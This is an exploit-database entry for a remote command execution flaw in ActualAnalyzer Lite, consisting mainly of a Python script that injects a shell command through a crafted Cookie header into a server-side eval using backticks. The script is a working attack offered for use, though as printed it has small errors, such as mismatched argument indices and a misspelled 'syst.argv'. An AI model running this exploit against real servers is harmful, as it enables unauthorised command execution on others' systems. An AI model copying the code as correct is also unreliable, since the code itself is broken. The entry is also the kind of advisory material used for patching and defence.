ActualAnalyzer Remote Command Execution

2014.08.29
Credit: Benjamin Harris
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

############################### # ActualAnalyzer exploit. # Tested on Lite version # We load command into a dummy variable as we only have 6 characters to own the eval # but load more as first 2 characters get rm'd. # We then execute the eval with backticks. # 11/05/2011 ############################## import urllib import urllib2 import sys import time def banner(): print " ____ __ __ __ " print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____" print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/" print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / " print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ " print " /_/ /____/ " def usage(): print " [+] Usage:" print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\"" print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\"" banner() if len(sys.argv) < 6: usage() quit() domain = sys.argv[2] command = sys.argv[6] host = syst.argv[4] def commandexploit(domain,host,command): url = 'http://' + domain + '/aa.php?anp=' + host data = None headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"} exploit1 = urllib2.Request(url,data,headers) exploit2 = urllib2.urlopen(exploit1) commandexploit(domain,host,command)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top